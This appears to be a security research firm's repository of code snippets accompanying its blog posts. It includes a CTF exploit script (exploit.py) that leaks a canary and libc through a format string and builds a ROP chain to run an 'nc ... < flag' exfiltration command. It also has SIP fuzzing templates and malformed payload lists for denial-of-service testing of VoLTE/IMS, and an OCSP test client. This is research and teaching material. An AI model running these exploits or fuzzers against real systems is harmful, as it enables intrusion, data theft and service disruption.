├── Insomnihack ├── README.md ├── baby-6971f0aeb454444a72cb5b7ac92524cd945812c2.tgz └── exploit.py ├── OCSP ├── README.md ├── client.py └── ocsp.py ├── README.md ├── VoLTE-dizzy ├── README.md ├── faultyIP.txt ├── integer.txt ├── invite.dizz ├── message.dizz ├── methods.txt ├── register.dizz └── subscribe.dizz ├── Win10-privacy ├── README.md └── Win10_Recommendation_1.0.xlsx ├── bmc_bladelogic ├── README.md ├── changePwd.py └── getUsers.py ├── gsm_troopers ├── README.md └── smpp_example_listener.py ├── malware_dissection_part2 ├── aubR9KfZ.xsl └── macro.vbs ├── maxcube ├── README.md ├── decrypt.py ├── firmware │ ├── firmware.enc │ └── parser │ │ ├── FirmwareFile.java │ │ └── FirmwareParser.java └── maxcube-info.nse ├── netmon_troopers ├── README.md ├── collectd.conf ├── grafana.ini ├── home_dashboard_troopers.json ├── influxdb.conf ├── screenshots │ ├── grafana_dashboard_netmon_troopers.png │ └── grafana_dashboard_netmon_troopers_bandwidth.png ├── scripts │ ├── cisco_arp_nbc.sh │ ├── cisco_wlc_bands.sh │ └── snmp_gw_wlc_troopers.py └── types_local.db ├── webex-linux ├── README.MD └── webex.sh └── windows_kernel_exploitation └── HEVD_64Kernel_UAF.py /Insomnihack/README.md: -------------------------------------------------------------------------------- 1 | Blog post: https://insinuator.net/2017/01/insomnihack-pwn50-write-up/ 2 | -------------------------------------------------------------------------------- /Insomnihack/baby-6971f0aeb454444a72cb5b7ac92524cd945812c2.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ernw/insinuator-snippets/837feffb79db74cc1566541c3373db315e817ba0/Insomnihack/baby-6971f0aeb454444a72cb5b7ac92524cd945812c2.tgz -------------------------------------------------------------------------------- /Insomnihack/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import struct 3 | import IPython 4 | System = 0 5 | System_Offset = 0x045390 6 | Shellcode = "AAAAAAAAAAAAAAAAAAAAAA; nc 1234 < flag;" + "\x00" 7 | Image_Offset = 0x1bf0 8 | printf_offset = 0x202f08 9 | libc_offset = 0x20830 10 | 11 | 12 | conn = remote('baby.teaser.insomnihack.ch',1337) 13 | message = conn.recvuntil('>',drop=True) 14 | 15 | 16 | # Leak Stack Addresses 17 | def leak(n, s): 18 | conn.send('2\n') 19 | conn.recvline() 20 | conn.send("%"+ str(n) + "$p\n") 21 | conn.recvuntil('> ',drop=True) 22 | leak = conn.recvuntil('\n', drop=True) 23 | print("Leaked " + s + ": " + leak) 24 | return int(leak, 16) 25 | 26 | 27 | # Leak Stack Canary 28 | stack_canary = leak(138, "Stack Canary") 29 | 30 | # Leak Libc + System Address 31 | libc = leak(158, "Libc Address") 32 | libc = libc - libc_offset 33 | print("Leaked Libc Base: " + hex(libc)) 34 | System = libc + System_Offset 35 | print("Calculated System Address: " + hex(System)) 36 | 37 | ## Leak ImageBase 38 | image = leak(146, "Imagebase Pointer") 39 | image = image - Image_Offset 40 | printf = image + printf_offset 41 | print("Calculated ImageBase: " + hex(image)) 42 | print("Calculated GoT Offset for PrintF: " + hex(printf)) 43 | 44 | ### Leak Stack Address 45 | stack = leak(1, "Stack Address") 46 | 47 | #Building ROP 48 | gadgets = "".join([struct.pack(" ',drop=True)) 58 | answer = "" 59 | print("sending 1") 60 | conn.send('1\n') 61 | print("sending 2000") 62 | conn.send('1300\n') 63 | print("sending BO Trigger") 64 | 65 | 66 | #Building Buffer 67 | Buffer = Shellcode + "A"*(1037-len(Shellcode)) + p64(stack_canary) + "A" * 8 + gadgets + p64(stack) + p64(System) + "E" * (1300-1032-8-len(gadgets)-8-8) 68 | conn.send(Buffer + '\n') 69 | 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /OCSP/README.md: -------------------------------------------------------------------------------- 1 | Blog post: https://insinuator.net/2015/10/ocsp-over-http-testing-with-python/ 2 | -------------------------------------------------------------------------------- /OCSP/client.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | import requests 4 | from pyasn1.type import univ 5 | from pyasn1.codec.ber import decoder, encoder 6 | from pyasn1_modules import rfc2459 7 | 8 | from ocsp import * 9 | 10 | # settings 11 | URL = 'https://yourdomain.tld/OCSP' 12 | PROXIES = { 13 | "http": "http://127.0.0.1:8080", 14 | "https": "http://127.0.0.1:8080", 15 | } 16 | 17 | # variables 18 | SERIAL_NUMBER = 0 19 | ISSUER_NAME_HASH = '01cb3044531fa8618a68d3c60596ab0555866b09' 20 | ISSUER_KEY_HASH = '31c3791bbaf553d717e0897a2d176c0ab32b9d33' 21 | ALGORITHM = rfc2437.id_sha1 22 | ALGO_PARAMS_HEX = '0500' 23 | 24 | 25 | 26 | def build_payload(): 27 | # initializations 28 | tbsReq = TBSRequest() 29 | certid = CertID() 30 | request = Request() 31 | requestList = univ.SequenceOf(componentType=Request()) 32 | req = OCSPRequest() 33 | reqExts = rfc2459.Extensions().subtype( 34 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2)) 35 | reqExt = rfc2459.Extension() 36 | signature = Signature() 37 | certs = univ.SequenceOf(componentType=rfc2459.Certificate()).subtype( 38 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0) 39 | ) 40 | cert = rfc2459.Certificate() 41 | name = rfc2459.GeneralName() 42 | 43 | 44 | # assignments 45 | certid['hashAlgorithm'] = rfc2459.AlgorithmIdentifier()\ 46 | .setComponentByName('algorithm', ALGORITHM)\ 47 | .setComponentByName('parameters', univ.Any(hexValue=ALGO_PARAMS_HEX)) 48 | 49 | certid['issuerNameHash'] = univ.OctetString(hexValue=ISSUER_NAME_HASH) 50 | certid['issuerKeyHash'] = univ.OctetString(hexValue=ISSUER_KEY_HASH) 51 | certid['serialNumber'] = rfc2459.CertificateSerialNumber(SERIAL_NUMBER) 52 | 53 | request['reqCert'] = certid 54 | 55 | # optional field 56 | #request['singleRequestExtension'] = reqExt 57 | 58 | reqExt['extnID'] = univ.ObjectIdentifier('1.3.6.1.5.5.7.48.1.2') 59 | reqExt['critical'] = univ.Boolean('False') 60 | reqExt['extnValue'] = univ.Any(hexValue='04120410236e5193af7958f49edcc756ed6c6dd3') 61 | 62 | reqExts[0] = reqExt 63 | requestList[0] = request 64 | 65 | # optional 66 | # TODO: fill name? 67 | #tbsReq['requestorName'] = name 68 | tbsReq['requestList'] = requestList 69 | 70 | # optional 71 | tbsReq['requestExtensions'] = reqExts 72 | tbsReq['version'] = Version(0).subtype( 73 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)) 74 | 75 | # optional 76 | # TODO fill cert? 77 | signature['signatureAlgorithm'] = rfc2459.AlgorithmIdentifier()\ 78 | .setComponentByName('algorithm', rfc2437.sha1WithRSAEncryption) 79 | signature['signature'] = univ.BitString("'010101010101'B") 80 | certs[0] = cert 81 | signature['certs'] = certs 82 | 83 | req['tbsRequest'] = tbsReq 84 | # optional signature 85 | #req['optionalSignature'] = signature 86 | 87 | return req 88 | 89 | 90 | def send_payload(payload): 91 | # encode in ASN.1 92 | data = encoder.encode(payload) 93 | 94 | # send to server 95 | response = requests.post(URL, 96 | headers={'Content-Type': 'application/ocsp-request'}, 97 | data=data, 98 | proxies=PROXIES) 99 | 100 | return response.content 101 | 102 | 103 | def decode(data, spec): 104 | # decode response 105 | ocspResponse = decoder.decode(data, asn1Spec=spec) 106 | 107 | for r in ocspResponse: 108 | # is asn.1 decodable? 109 | if hasattr(r, 'prettyPrint'): 110 | return r 111 | 112 | 113 | if __name__ == '__main__': 114 | from pyasn1 import debug 115 | 116 | payload = build_payload() 117 | response = send_payload(payload) 118 | response = decode(response, OCSPResponse()) 119 | print("Status:", response['responseStatus'].prettyPrint()) 120 | #debug.setLogger(debug.Debug('all')) 121 | response = decode(response['responseBytes']['response'], BasicOCSPResponse()) 122 | print(response.prettyPrint()) 123 | -------------------------------------------------------------------------------- /OCSP/ocsp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | # author: Timo Schmid 4 | # license: GPLv3 5 | 6 | from pyasn1.type import univ, namedtype, tag, namedval, base, useful 7 | from pyasn1_modules import rfc2459, rfc2437, rfc2560 8 | 9 | # request 10 | class Version(univ.Integer): 11 | namedValues = namedval.NamedValues( 12 | ('v1', 0) 13 | ) 14 | 15 | 16 | class CertID(univ.Sequence): 17 | componentType = namedtype.NamedTypes( 18 | namedtype.NamedType('hashAlgorithm', rfc2459.AlgorithmIdentifier()), 19 | namedtype.NamedType('issuerNameHash', univ.OctetString()), 20 | namedtype.NamedType('issuerKeyHash', univ.OctetString()), 21 | namedtype.NamedType('serialNumber', rfc2459.CertificateSerialNumber()) 22 | ) 23 | 24 | 25 | class Request(univ.Sequence): 26 | componentType = namedtype.NamedTypes( 27 | namedtype.NamedType('reqCert', CertID()), 28 | namedtype.OptionalNamedType('singleRequestExtensions', rfc2459.Extensions().subtype( 29 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0) 30 | )) 31 | ) 32 | 33 | 34 | class TBSRequest(univ.Sequence): 35 | componentType = namedtype.NamedTypes( 36 | namedtype.DefaultedNamedType('version', Version(0).subtype( 37 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))), 38 | namedtype.OptionalNamedType('requestorName', rfc2459.GeneralName().subtype( 39 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1) 40 | )), 41 | namedtype.NamedType('requestList', univ.SequenceOf(componentType=Request())), 42 | namedtype.OptionalNamedType('requestExtensions', rfc2459.Extensions().subtype( 43 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2) 44 | )) 45 | ) 46 | 47 | 48 | class Certs(univ.SequenceOf): 49 | componentType=rfc2459.Certificate() 50 | 51 | 52 | class Signature(univ.Sequence): 53 | componentType = namedtype.NamedTypes( 54 | namedtype.NamedType('signatureAlgorithm', rfc2459.AlgorithmIdentifier()), 55 | namedtype.NamedType('signature', univ.BitString()), 56 | namedtype.NamedType('certs', Certs().subtype( 57 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0) 58 | ) 59 | ) 60 | ) 61 | 62 | 63 | class OCSPRequest(univ.Sequence): 64 | componentType = namedtype.NamedTypes( 65 | namedtype.NamedType('tbsRequest', TBSRequest()), 66 | namedtype.OptionalNamedType('optionalSignature', Signature().subtype( 67 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))) 68 | ) 69 | 70 | 71 | 72 | # response 73 | class OCSPResponseStatus(univ.Enumerated): 74 | namedValues = namedval.NamedValues( 75 | ('successful', 0), 76 | ('malformedRequest', 1), 77 | ('internalError', 2), 78 | ('tryLater', 3), 79 | #('not-used', 4), 80 | ('sigRequired', 5), 81 | ('unauthorized', 6) 82 | ) 83 | 84 | 85 | class ResponseBytes(univ.Sequence): 86 | componentType = namedtype.NamedTypes( 87 | namedtype.NamedType('responseType', univ.ObjectIdentifier()), 88 | namedtype.NamedType('response', univ.OctetString()) 89 | ) 90 | 91 | 92 | class OCSPResponse(univ.Sequence): 93 | componentType = namedtype.NamedTypes( 94 | namedtype.NamedType('responseStatus', OCSPResponseStatus()), 95 | namedtype.OptionalNamedType('responseBytes', ResponseBytes().subtype( 96 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0) 97 | )) 98 | ) 99 | 100 | 101 | KeyHash = univ.OctetString 102 | UnknownInfo = univ.Null 103 | 104 | 105 | class RevokedInfo(univ.Sequence): 106 | componentType = namedtype.NamedTypes( 107 | namedtype.NamedType('revocationTime', useful.GeneralizedTime()), 108 | namedtype.OptionalNamedType('revocationReason', rfc2459.CRLReason().subtype( 109 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0) 110 | )) 111 | ) 112 | 113 | 114 | class CertStatus(univ.Choice): 115 | componentType = namedtype.NamedTypes( 116 | namedtype.NamedType('good', univ.Null().subtype( 117 | implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0) 118 | )), 119 | namedtype.NamedType('revoked', RevokedInfo().subtype( 120 | implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1) 121 | )), 122 | namedtype.NamedType('unknown', UnknownInfo().subtype( 123 | implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2) 124 | )) 125 | ) 126 | 127 | 128 | class SingleResponse(univ.Sequence): 129 | componentType = namedtype.NamedTypes( 130 | namedtype.NamedType('certID', CertID()), 131 | namedtype.NamedType('certStatus', CertStatus()), 132 | namedtype.NamedType('thisUpdate', useful.GeneralizedTime()), 133 | namedtype.OptionalNamedType('nextUpdate', useful.GeneralizedTime().subtype( 134 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0) 135 | )), 136 | namedtype.OptionalNamedType('singleExtensions', rfc2459.Extensions().subtype( 137 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2) 138 | )) 139 | ) 140 | 141 | 142 | class ResponderID(univ.Choice): 143 | componentType = namedtype.NamedTypes( 144 | namedtype.NamedType('byName', rfc2459.Name().subtype( 145 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))), 146 | namedtype.NamedType('byKey', KeyHash().subtype( 147 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))), 148 | ) 149 | 150 | 151 | class ResponseData(univ.Sequence): 152 | componentType = namedtype.NamedTypes( 153 | namedtype.DefaultedNamedType('version', Version(0).subtype( 154 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))), 155 | namedtype.NamedType('responderID', ResponderID()), 156 | namedtype.NamedType('producedAt', useful.GeneralizedTime()), 157 | namedtype.NamedType('responses', univ.SequenceOf(componentType=SingleResponse())), 158 | namedtype.OptionalNamedType('responseExtensions', rfc2459.Extensions().subtype( 159 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1) 160 | )) 161 | ) 162 | 163 | 164 | class BasicOCSPResponse(univ.Sequence): 165 | componentType = namedtype.NamedTypes( 166 | namedtype.NamedType('tbsResponseData', ResponseData()), 167 | namedtype.NamedType('signatureAlgorithm', rfc2459.AlgorithmIdentifier()), 168 | namedtype.NamedType('signature', univ.BitString()), 169 | namedtype.OptionalNamedType('certs', Certs().subtype( 170 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0) 171 | )) 172 | ) 173 | 174 | 175 | 176 | if __name__ == '__main__': 177 | import sys 178 | from pyasn1 import debug 179 | from pyasn1.codec.ber import decoder, encoder 180 | 181 | #debug.setLogger(debug.Debug('all')) 182 | 183 | if len(sys.argv) <= 1: 184 | req = OCSPRequest() 185 | req['tbsRequest'] = TBSRequest() 186 | req['tbsRequest']['version'] = Version(0).subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)) 187 | request = Request() 188 | certid = CertID() 189 | request['reqCert'] = certid 190 | certid['hashAlgorithm'] = rfc2459.AlgorithmIdentifier()\ 191 | .setComponentByName('algorithm', rfc2437.id_sha1)\ 192 | .setComponentByName('parameters', univ.Any(hexValue='0500')) 193 | certid['issuerNameHash'] = univ.OctetString(hexValue='01cb3044531fa8618a68d3c60596ab0555866b09') 194 | certid['issuerKeyHash'] = univ.OctetString(hexValue='31c3791bbaf553d717e0897a2d176c0ab32b9d33') 195 | certid['serialNumber'] = rfc2459.CertificateSerialNumber(0) 196 | req['tbsRequest']['requestList'] = univ.SequenceOf(componentType=Request()).setComponentByPosition(0, request) 197 | reqExts = rfc2459.Extensions().subtype( 198 | explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2)) 199 | reqExt = rfc2459.Extension() 200 | reqExt['extnID'] = univ.ObjectIdentifier('1.3.6.1.5.5.7.48.1.2') 201 | reqExt['critical'] = univ.Boolean('False') 202 | reqExt['extnValue'] = univ.Any(hexValue='04120410236e5193af7958f49edcc756ed6c6dd3') 203 | reqExts[0] = reqExt 204 | req['tbsRequest']['requestExtensions'] = reqExts 205 | print(req.prettyPrint()) 206 | 207 | print(encoder.encode(req)) 208 | else: 209 | with open(sys.argv[1], 'rb') as fp: 210 | for t in decoder.decode(fp.read(), asn1Spec=OCSPRequest()): 211 | if hasattr(t, 'prettyPrint'): 212 | print(t.prettyPrint()) 213 | else: 214 | print(t) 215 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Insinuator Snippets 2 | =================== 3 | 4 | This repository contains code and files referenced in [Insinuator](https://www.insinuator.net/) blog posts. 5 | -------------------------------------------------------------------------------- /VoLTE-dizzy/README.md: -------------------------------------------------------------------------------- 1 | The .dizz files create malformed SIP messages to fuzz an IMS, which manages Multimedia services of LTE networks such as voice calls and text messages. 2 | 3 | The generated SIP messages simulate those exchanged with OpenIMS, which is an open source simulation of an IMS environment. 4 | The files faultyIP.txt, integer.txt and method.txt are contain payloads to attack parameters that usually take IP addresses, integers and SIP methods respectively. They might not be as effective as dizzy standard payloads but they save time. 5 | 6 | Any suggestions to modify dizz files or the payload files are welcome :) 7 | 8 | For more information about the attacks, please visit the blogpost https://www.insinuator.net/2016/02/denial-of-service-attacks-on-volte/ 9 | -------------------------------------------------------------------------------- /VoLTE-dizzy/faultyIP.txt: -------------------------------------------------------------------------------- 1 | 0.0.0.0 2 | 257.0.0.0 3 | 255.255.255.255 4 | 192.168.56 5 | 10.2 6 | 127.0.0.1 7 | 192.168.56.4/18 -------------------------------------------------------------------------------- /VoLTE-dizzy/integer.txt: -------------------------------------------------------------------------------- 1 | \x01\x00 2 | \x01\x00\x00 3 | \x01\x00\x00\x00\x00 4 | \x01\x00\x00\x00\x00\x00\x00\x00\x00 5 | \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 6 | 0 7 | -3 8 | 1000000000000000000 9 | 4.7 10 | abc 11 | 4'89 12 | 8,08 13 | 3/67 14 | 5T7a 15 | 01 16 | 000000000000000000000000000000000000000000000000000000000000000000000001 -------------------------------------------------------------------------------- /VoLTE-dizzy/invite.dizz: -------------------------------------------------------------------------------- 1 | #SIP Invite 2 | #User already registered 3 | 4 | ip_dst = "192.168.56.103" 5 | ip_src = "192.168.56.101" 6 | port_src = "5060" 7 | #P-CSCF port number 8 | port_dst = "4060" 9 | impu_host = "alice" 10 | callee_host = "bob" 11 | domain = "open-ims.test" 12 | 13 | name = "SIP INVITE" 14 | 15 | objects = [ 16 | #INVITE sip:bob@open-ims.test SIP/2.0 17 | list("Method", "INVITE", "dizzes/sip/methods.txt"), 18 | field("blank1", 8, " ", none), 19 | field("prot1", 24, "sip", none), 20 | field("sep1",8, ":", none), 21 | field("calee1",None,callee_host,none) , 22 | field("sep76", 8, "@", none), 23 | field("reqURI", None,domain,none), 24 | field("blank2", 8, " ", none), 25 | field("sip_version", 56, "SIP/2.0", none), 26 | field("crlf1",16, "\x0d\x0a", none), 27 | # Call-ID: 080027d9-2ede0003-00001c04-00000403 28 | field("name4", 56, "Call-ID", none), 29 | field("sep12", 8, ":", none), 30 | field("call_id", None, "578222729-4665d775", std), 31 | field("crlf5", 16, "\x0d\x0a", none), 32 | #CSeq: 101 INVITE 33 | field("name7", 32, "CSeq", none), 34 | field("sep15", 8, ":", none), 35 | field("blank6", 8, " ", none), 36 | list("CSeq_num", "5", "dizzes/sip/integer.txt"), 37 | field("blank7", 8, " ", none), 38 | list("method2", "INVITE", "dizzes/sip/methods.txt"), 39 | field("crlf8", 16, "\x0d\x0a", none), 40 | #From: "Alice" ;tag=1102 41 | field("name2", 32, "From", none), 42 | field("sep5", 8, ":", none), 43 | field("blank5", 8, " ", none), 44 | field("fromName", None, '"Alice"', none), 45 | field("blank51", 8, " ", none), 46 | field("lt1", 8, "<", none), 47 | field("prot3", 24, "sip", none), 48 | field("sep6", 8, ":", none), 49 | field("impuHost", None, impu_host, std), 50 | field("sep7", 8, "@", none), 51 | field("domain", None, domain, none), 52 | field("gt1", 8, ">", none), 53 | field("sep8", 8, ";", none), 54 | field("tag343", 24, "tag", none), 55 | field("equal8", 8, "=", none), 56 | field("tag2", None, "903df0a", std), 57 | field("crlf3", 16, "\x0d\x0a", none), 58 | # To: 59 | field("name3",16, "To", none), 60 | field("sep9", 8, ":", none), 61 | field("lt2", 8, "<", none), 62 | field("prot4", 24, "sip", none), 63 | field("sep10", 8, ":", none), 64 | field("session_id2", None, callee_host, none), 65 | field("sep11", 8, "@", none), 66 | field("domainTo", None, domain, none), 67 | field("gt2", 8, ">", none), 68 | field("crlf4", 16, "\x0d\x0a", none), 69 | # Via: SIP/2.0/UDP 192.168.56.101:5060;branch=z9hG4bK00000241 70 | field("via", 24, "Via", none), 71 | field("sep2", 8, ":", none), 72 | field("blank3", 8, " ", none), 73 | field("prot2", 88, "SIP/2.0/UDP", none), 74 | field("blank4", 8, " ", none), 75 | list("ipViaList", ip_src, "dizzes/sip/faultyIP.txt"), 76 | field("separator3", 8, ":", none), 77 | field("port1", None, port_src, none), 78 | field("sep3", 8, ";", none), 79 | field("tag28", 48, "branch", none), 80 | field("equal1", 8, "=", none), 81 | field("branch" , None, "z9hG4bKnp151248737", std), 82 | field("crlf2", 16, "\x0d\x0a", none), 83 | # Max-Forwards: 70 84 | field("name5", 96, "Max-Forwards", none), 85 | field("sep13", 8, ":", none), 86 | list("max_forwards", "20", "dizzes/sip/integer.txt"), 87 | field("crlf6", 16, "\x0d\x0a", none), 88 | # Route: 89 | field("nameRoute", 40, "Route", none), 90 | field("sepR1", 8, ":", none), 91 | field("blankR1", 8, " ", none), 92 | field("ltR1", 8, "<", none), 93 | field("protR1", 24, "sip", none), 94 | field("sepR2", 8, ":", none), 95 | field("theWholeRoute",None,"orig@scscf.open-ims.test",std), 96 | field("sepR3", 8, ":", none), 97 | list("portR2", "6060", "dizzes/sip/integer.txt"), 98 | field("sepR5", 8, ";", none), 99 | field("lr", 16, "lr", none), 100 | field("gtR3", 8, ">", none), 101 | field("crlfRoute", 16, "\x0d\x0a", none), 102 | #Content-Type: application/sdp 103 | field("nameCT", None, "Content-Type", none), 104 | field("sepCT", 8, ":", none), 105 | field("stringCT", None, "application/sdp", none), 106 | field("crlfCT", 16, "\x0d\x0a", none), 107 | #Contact: 108 | field("name9", 56, "Contact", none), 109 | field("sep16", 8, ":", none), 110 | field("blank8", 8, " ", none), 111 | field("lt3", 8, "<", none), 112 | field("prot5", 24, "sip", none), 113 | field("sep17", 8, ":", none), 114 | field("impuHostContact", None, impu_host, none), 115 | field("sep18", 8, "@", none), 116 | list("ipContList", ip_src, "dizzes/sip/faultyIP.txt"), 117 | field("sep19", 8, ":", none), 118 | list("contactPortList", port_src, "dizzes/sip/integer.txt"), 119 | field("sep20", 8, ";", none), 120 | field("tag3", None, "line", none), 121 | field("equal2", 8, "=", none), 122 | field("tag4", None, "9c7d2db8822013c", none), 123 | field("gt3", 8, ">", none), 124 | field("crlf9", 16, "\x0d\x0a", none), 125 | #User-Agent: Cisco-SIPIPCommunicator/9.1.1 126 | field("name8", 80, "User-Agent", none), 127 | field("sep21", 8, ":", none), 128 | field("string", None, "Cisco-SIPIPCommunicator", none), 129 | field("sep23", 8, "/", none), 130 | field("version", None, "9.1.1", none), 131 | field("crlf10", 16, "\x0d\x0a", none), 132 | #Content-Length: 118 133 | field("name10", None, "Content-Length", none), 134 | field("sep22", 8, ":", none), 135 | #field("string2", None, "118", none), 136 | list("contLengthList", "118", "dizzes/sip/integer.txt"), 137 | field("crlfContLength", 16, "\x0d\x0a", none), 138 | # Close Header with CRLF 139 | field("crlf11", 16, "\x0d\x0a", none), 140 | #SDP 141 | field("sdp1", 24, "v=0", none), 142 | field("newLine1", 16, "\x0d\x0a", none), 143 | field("sdp2", None, "o=user 0 0 IN IP4 127.0.1.1", none), 144 | field("newLine2", 16, "\x0d\x0a", none), 145 | field("sdp_S", None, "s=The funky IMS stream", none), 146 | field("newLine13", 16, "\x0d\x0a", none), 147 | field("sdp3", None, "c=IN IP4 192.168.56.101", none), 148 | field("newLine3", 16, "\x0d\x0a", none), 149 | field("sdp_t", None, "t=0 0", none), 150 | field("newLine_t", 16, "\x0d\x0a", none), 151 | field("sdp4", None, "m=audio 8000 RTP/AVP 0 3 8", none), 152 | field("newLine4", 16, "\x0d\x0a", none), 153 | #field("crlfFinal", 16, "\x0d\x0a", none), 154 | ] 155 | 156 | functions=[] 157 | -------------------------------------------------------------------------------- /VoLTE-dizzy/message.dizz: -------------------------------------------------------------------------------- 1 | #SIP Message 2 | 3 | ip_src = "192.168.56.101" 4 | ip_dst = "192.168.56.102" 5 | port_src = "5060" 6 | port_dst = "4060" 7 | impu_host = "alice" 8 | impu_rx = "bob" 9 | domain = "open-ims.test" 10 | 11 | name = "SIP Subscribe" 12 | 13 | objects = [ 14 | #MESSAGE sip:bob@open-ims.test SIP/2.0 15 | list("Method", "MESSAGE", "dizzes/sip/methods.txt"), 16 | #field("Method", None, "MESSAGE", none), 17 | field("blank1", 8, " ", none), 18 | field("prot1", 24, "sip", none), 19 | field("sep1",8, ":", none), 20 | field("reqHost",None, impu_rx, none), 21 | field("reqAt",8, "@", none), 22 | field("reqURI",104,domain,none), 23 | field("blank2", 8, " ", none), 24 | field("sip_version", 56, "SIP/2.0", none), 25 | field("crlf1",16, "\x0d\x0a", none), 26 | # Call-ID: 15c6999b990b1ac5e9139309abff7a46 27 | field("nameCID", 56, "Call-ID", none), 28 | field("sepCID", 16, ": ", none), 29 | field("CallID", None, "15c6999b990b1ac5e9139309abff7a46", none), 30 | field("crlf5", 16, "\x0d\x0a", none), 31 | # CSeq: 10 MESSAGE 32 | field("nameCSeq", 32, "CSeq", none), 33 | field("sepCSeq", 8, ":", none), 34 | field("blankCSeq", 8, " ", none), 35 | list("CSeqNum", "10", "dizzes/sip/integer.txt"), 36 | # field("CSeqNumField", None, "10", none), 37 | field("blankCSeq2", 8, " ", none), 38 | list("methodCSeq", "MESSAGE", "dizzes/sip/methods.txt"), 39 | field("crlf8", 16, "\x0d\x0a", none), 40 | # From: ;tag=1000 41 | field("name2", 32, "From", none), 42 | field("sep5", 8, ":", none), 43 | field("blank5", 8, " ", none), 44 | field("fromName", None, '"Alice"', none), 45 | field("blank51", 8, " ", none), 46 | field("lt1", 8, "<", none), 47 | field("prot3", 24, "sip", none), 48 | field("sep6", 8, ":", none), 49 | field("impuHost", None, impu_host, none), 50 | field("sep7", 8, "@", none), 51 | field("domain", None, domain, none), 52 | field("gt1", 8, ">", none), 53 | field("sep8", 8, ";", none), 54 | field("tag343", 24, "tag", none), 55 | field("equal8", 8, "=", none), 56 | field("tag2", None, "903df0a", std), 57 | field("crlf3", 16, "\x0d\x0a", none), 58 | # To: "Bob" 59 | field("name3",16, "To", none), 60 | field("sep9", 8, ":", none), 61 | field("blankTo", 8, " ", none), 62 | field("ToName", None, '"Bob"', none), 63 | field("blankTo1", 8, " ", none), 64 | field("lt2", 8, "<", none), 65 | field("prot4", 24, "sip", none), 66 | field("sep10", 8, ":", none), 67 | field("impuHost2", None, impu_rx, none), 68 | field("sep11", 8, "@", none), 69 | field("domainTo", None, domain, none), 70 | field("gt2", 8, ">", none), 71 | field("crlf4", 16, "\x0d\x0a", none), 72 | # Via: SIP/2.0/UDP 192.168.56.101:5060;branch=z9hG4bK41760951933bd19eaccc65c1e80dd321 73 | field("via", 24, "Via", none), 74 | field("sep2", 8, ":", none), 75 | field("blank3", 8, " ", none), 76 | field("prot2", 88, "SIP/2.0/UDP", none), 77 | field("blank4", 8, " ", none), 78 | #field("ipVia", len(ip_src)*8, ip_src, none), 79 | list("ipViaList", ip_src, "dizzes/sip/faultyIP.txt"), 80 | field("separator3", 8, ":", none), 81 | field("port1", None, port_src, none), 82 | field("sep3", 8, ";", none), 83 | field("tag28", 48, "branch", none), 84 | field("equal1", 8, "=", none), 85 | field("branch", None, "z9hG4bKnp151248737", std), 86 | field("crlf2", 16, "\x0d\x0a", none), 87 | # Max-Forwards: 70 88 | field("name5", 96, "Max-Forwards", none), 89 | field("sep13", 16, ": ", none), 90 | list("maxForwards", "70", "dizzes/sip/integer.txt"), 91 | #field("max_forwards", None, "70", std), 92 | field("crlf6", 16, "\x0d\x0a", none), 93 | # Content-Type: text/plain 94 | field("contType", None, "Content-Type", none), 95 | field("scolcontType", 8, ":", none), 96 | field("spacecontType", 8, " ", none), 97 | field("contTypeValue", None, "text/plain", none), 98 | field("crlfcontType", 16, "\x0d\x0a", none), 99 | # Route: 100 | field("nameRoute", 40, "Route", none), 101 | field("sepR1", 8, ":", none), 102 | field("blankR1", 8, " ", none), 103 | field("ltR1", 8, "<", none), 104 | field("protR1", 24, "sip", none), 105 | field("sepR2", 8, ":", none), 106 | field("theWholeRoute",None,"orig@scscf.open-ims.test",std), 107 | field("sepR3", 8, ":", none), 108 | list("portR2", "6060", "dizzes/sip/integer.txt"), 109 | field("sepR5", 8, ";", none), 110 | field("lr", 16, "lr", none), 111 | field("gtR3", 8, ">", none), 112 | field("crlfRoute", 16, "\x0d\x0a", none), 113 | # Contact: 114 | field("name9", 56, "Contact", none), 115 | field("sep16", 8, ":", none), 116 | field("blank8", 8, " ", none), 117 | field("lt3", 8, "<", none), 118 | field("prot5", 24, "sip", none), 119 | field("sep17", 8, ":", none), 120 | field("impuHostContact", None, impu_host, none), 121 | field("sep18", 8, "@", none), 122 | list("ipContList", ip_src, "dizzes/sip/faultyIP.txt"), 123 | #field("ip_gw3", len(ip_src)*8, ip_src, none), 124 | field("sep19", 8, ":", none), 125 | list("contactPortList", port_src, "dizzes/sip/integer.txt"), 126 | field("gt3", 8, ">", none), 127 | field("crlf9", 16, "\x0d\x0a", none), 128 | 